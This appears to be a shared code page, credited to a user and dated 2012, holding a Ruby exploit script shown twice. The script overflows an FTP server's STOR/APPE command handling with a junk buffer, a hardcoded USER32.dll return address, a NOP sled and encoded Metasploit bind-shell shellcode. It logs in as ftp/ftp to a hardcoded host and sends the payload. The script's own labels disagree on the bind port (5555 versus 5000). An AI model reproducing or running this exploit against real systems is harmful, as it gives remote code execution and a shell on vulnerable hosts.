KINGSABRI · April 14, 2012 20:17
diff --git a/ability-STOR6.rb b/ability-STOR6.rb
 #!/bin/ruby 

 require 'colorize'
 require 'socket'

 mark_Red = "[+]".red
 mark_Green = "[+]".green
 mark_yellow = "[+]".yellow

 ##################################


 junk      = "A" * 969
 eip       = "\x0A\xAF\xD8\x77"   # 0x77D8AF0A USER32.dll
 nop 	  = "\x90" * 32
 shellcode = #./msfpayload windows/shell_bind_tcp LPORT=5555 R | msfencode -a x86 -b '\x00\x0a\x0d'  -t ruby (size 368)
 "\xb8\x9d\xb8\xa7\x3e\xda\xc4\xd9\x74\x24\xf4\x5b\x33\xc9" +
 "\xb1\x56\x31\x43\x13\x83\xc3\x04\x03\x43\x92\x5a\x52\xc2" +
 "\x44\x13\x9d\x3b\x94\x44\x17\xde\xa5\x56\x43\xaa\x97\x66" +
 "\x07\xfe\x1b\x0c\x45\xeb\xa8\x60\x42\x1c\x19\xce\xb4\x13" +
 "\x9a\xfe\x78\xff\x58\x60\x05\x02\x8c\x42\x34\xcd\xc1\x83" +
 "\x71\x30\x29\xd1\x2a\x3e\x9b\xc6\x5f\x02\x27\xe6\x8f\x08" +
 "\x17\x90\xaa\xcf\xe3\x2a\xb4\x1f\x5b\x20\xfe\x87\xd0\x6e" +
 "\xdf\xb6\x35\x6d\x23\xf0\x32\x46\xd7\x03\x92\x96\x18\x32" +
 "\xda\x75\x27\xfa\xd7\x84\x6f\x3d\x07\xf3\x9b\x3d\xba\x04" +
 "\x58\x3f\x60\x80\x7d\xe7\xe3\x32\xa6\x19\x20\xa4\x2d\x15" +
 "\x8d\xa2\x6a\x3a\x10\x66\x01\x46\x99\x89\xc6\xce\xd9\xad" +
 "\xc2\x8b\xba\xcc\x53\x76\x6d\xf0\x84\xde\xd2\x54\xce\xcd" +
 "\x07\xee\x8d\x99\xe4\xdd\x2d\x5a\x62\x55\x5d\x68\x2d\xcd" +
 "\xc9\xc0\xa6\xcb\x0e\x26\x9d\xac\x81\xd9\x1d\xcd\x88\x1d" +
 "\x49\x9d\xa2\xb4\xf1\x76\x33\x38\x24\xd8\x63\x96\x96\x99" +
 "\xd3\x56\x46\x72\x3e\x59\xb9\x62\x41\xb3\xcc\xa4\x8f\xe7" +
 "\x9d\x42\xf2\x17\x34\x20\x7b\xf1\x5c\x56\x2a\xa9\xc8\x94" +
 "\x09\x62\x6f\xe6\x7b\xde\x38\x70\x33\x08\xfe\x7f\xc4\x1e" +
 "\xad\x2c\x6c\xc9\x25\x3f\xa9\xe8\x3a\x6a\x99\x63\x03\xfd" +
 "\x53\x1a\xc6\x9f\x64\x37\xb0\x3c\xf6\xdc\x40\x4a\xeb\x4a" +
 "\x17\x1b\xdd\x82\xfd\xb1\x44\x3d\xe3\x4b\x10\x06\xa7\x97" +
 "\xe1\x89\x26\x55\x5d\xae\x38\xa3\x5e\xea\x6c\x7b\x09\xa4" +
 "\xda\x3d\xe3\x06\xb4\x97\x58\xc1\x50\x61\x93\xd2\x26\x6e" +
 "\xfe\xa4\xc6\xdf\x57\xf1\xf9\xd0\x3f\xf5\x82\x0c\xa0\xfa" +
 "\x59\x95\xd0\xb0\xc3\xbc\x78\x1d\x96\xfc\xe4\x9e\x4d\xc2" +
 "\x10\x1d\x67\xbb\xe6\x3d\x02\xbe\xa3\xf9\xff\xb2\xbc\x6f" +
 "\xff\x61\xbc\xa5"

    
 rest	= "C" * (2000 - (junk + eip + nop + shellcode).size)

 exploit = junk + eip + nop + shellcode + rest

    
 #--> Networking
 host = '10.0.0.90'
 port = 21
 s = TCPSocket.open(host, port)
 s.recv(1024)
 puts mark_Red + " Sending Username" + ".".green
 s.send("USER ftp\r\n", 0)
 s.recv(1024)
 puts mark_Red + " Sending Password" + ".".green
 s.send("PASS ftp\r\n", 0)
 s.recv(1024)
 puts mark_Red + " Sending Evil buffer" + "...".green
 #puts s.send("APPE #{buffer}\r\n", 0)  # Works
 s.send("APPE " + exploit + "\r\n", 0)
 total = s.send("STOR " + exploit + "\r\n", 0)
 sleep 0.2


 #--> Exploit Info
 puts mark_Red + "---------------------".green
 puts mark_Red + " Total exploit size: " + "#{total} bytes.".green
 puts mark_Red + " Buffer length: " + "#{exploit.size} bytes.".green
 puts mark_Red + " Shellcode Type: " + "Bind tcp/5000".green
 puts mark_Red + " Done" + "!".green

 s.close
	#!/bin/ruby

	require 'colorize'
	require 'socket'

	mark_Red = "[+]".red
	mark_Green = "[+]".green
	mark_yellow = "[+]".yellow

	##################################


	junk = "A" * 969
	eip = "\x0A\xAF\xD8\x77" # 0x77D8AF0A USER32.dll
	nop = "\x90" * 32
	shellcode = #./msfpayload windows/shell_bind_tcp LPORT=5555 R \| msfencode -a x86 -b '\x00\x0a\x0d' -t ruby (size 368)
	"\xb8\x9d\xb8\xa7\x3e\xda\xc4\xd9\x74\x24\xf4\x5b\x33\xc9" +
	"\xb1\x56\x31\x43\x13\x83\xc3\x04\x03\x43\x92\x5a\x52\xc2" +
	"\x44\x13\x9d\x3b\x94\x44\x17\xde\xa5\x56\x43\xaa\x97\x66" +
	"\x07\xfe\x1b\x0c\x45\xeb\xa8\x60\x42\x1c\x19\xce\xb4\x13" +
	"\x9a\xfe\x78\xff\x58\x60\x05\x02\x8c\x42\x34\xcd\xc1\x83" +
	"\x71\x30\x29\xd1\x2a\x3e\x9b\xc6\x5f\x02\x27\xe6\x8f\x08" +
	"\x17\x90\xaa\xcf\xe3\x2a\xb4\x1f\x5b\x20\xfe\x87\xd0\x6e" +
	"\xdf\xb6\x35\x6d\x23\xf0\x32\x46\xd7\x03\x92\x96\x18\x32" +
	"\xda\x75\x27\xfa\xd7\x84\x6f\x3d\x07\xf3\x9b\x3d\xba\x04" +
	"\x58\x3f\x60\x80\x7d\xe7\xe3\x32\xa6\x19\x20\xa4\x2d\x15" +
	"\x8d\xa2\x6a\x3a\x10\x66\x01\x46\x99\x89\xc6\xce\xd9\xad" +
	"\xc2\x8b\xba\xcc\x53\x76\x6d\xf0\x84\xde\xd2\x54\xce\xcd" +
	"\x07\xee\x8d\x99\xe4\xdd\x2d\x5a\x62\x55\x5d\x68\x2d\xcd" +
	"\xc9\xc0\xa6\xcb\x0e\x26\x9d\xac\x81\xd9\x1d\xcd\x88\x1d" +
	"\x49\x9d\xa2\xb4\xf1\x76\x33\x38\x24\xd8\x63\x96\x96\x99" +
	"\xd3\x56\x46\x72\x3e\x59\xb9\x62\x41\xb3\xcc\xa4\x8f\xe7" +
	"\x9d\x42\xf2\x17\x34\x20\x7b\xf1\x5c\x56\x2a\xa9\xc8\x94" +
	"\x09\x62\x6f\xe6\x7b\xde\x38\x70\x33\x08\xfe\x7f\xc4\x1e" +
	"\xad\x2c\x6c\xc9\x25\x3f\xa9\xe8\x3a\x6a\x99\x63\x03\xfd" +
	"\x53\x1a\xc6\x9f\x64\x37\xb0\x3c\xf6\xdc\x40\x4a\xeb\x4a" +
	"\x17\x1b\xdd\x82\xfd\xb1\x44\x3d\xe3\x4b\x10\x06\xa7\x97" +
	"\xe1\x89\x26\x55\x5d\xae\x38\xa3\x5e\xea\x6c\x7b\x09\xa4" +
	"\xda\x3d\xe3\x06\xb4\x97\x58\xc1\x50\x61\x93\xd2\x26\x6e" +
	"\xfe\xa4\xc6\xdf\x57\xf1\xf9\xd0\x3f\xf5\x82\x0c\xa0\xfa" +
	"\x59\x95\xd0\xb0\xc3\xbc\x78\x1d\x96\xfc\xe4\x9e\x4d\xc2" +
	"\x10\x1d\x67\xbb\xe6\x3d\x02\xbe\xa3\xf9\xff\xb2\xbc\x6f" +
	"\xff\x61\xbc\xa5"


	rest = "C" * (2000 - (junk + eip + nop + shellcode).size)

	exploit = junk + eip + nop + shellcode + rest


	#--> Networking
	host = '10.0.0.90'
	port = 21
	s = TCPSocket.open(host, port)
	s.recv(1024)
	puts mark_Red + " Sending Username" + ".".green
	s.send("USER ftp\r\n", 0)
	s.recv(1024)
	puts mark_Red + " Sending Password" + ".".green
	s.send("PASS ftp\r\n", 0)
	s.recv(1024)
	puts mark_Red + " Sending Evil buffer" + "...".green
	#puts s.send("APPE #{buffer}\r\n", 0) # Works
	s.send("APPE " + exploit + "\r\n", 0)
	total = s.send("STOR " + exploit + "\r\n", 0)
	sleep 0.2


	#--> Exploit Info
	puts mark_Red + "---------------------".green
	puts mark_Red + " Total exploit size: " + "#{total} bytes.".green
	puts mark_Red + " Buffer length: " + "#{exploit.size} bytes.".green
	puts mark_Red + " Shellcode Type: " + "Bind tcp/5000".green
	puts mark_Red + " Done" + "!".green

	s.close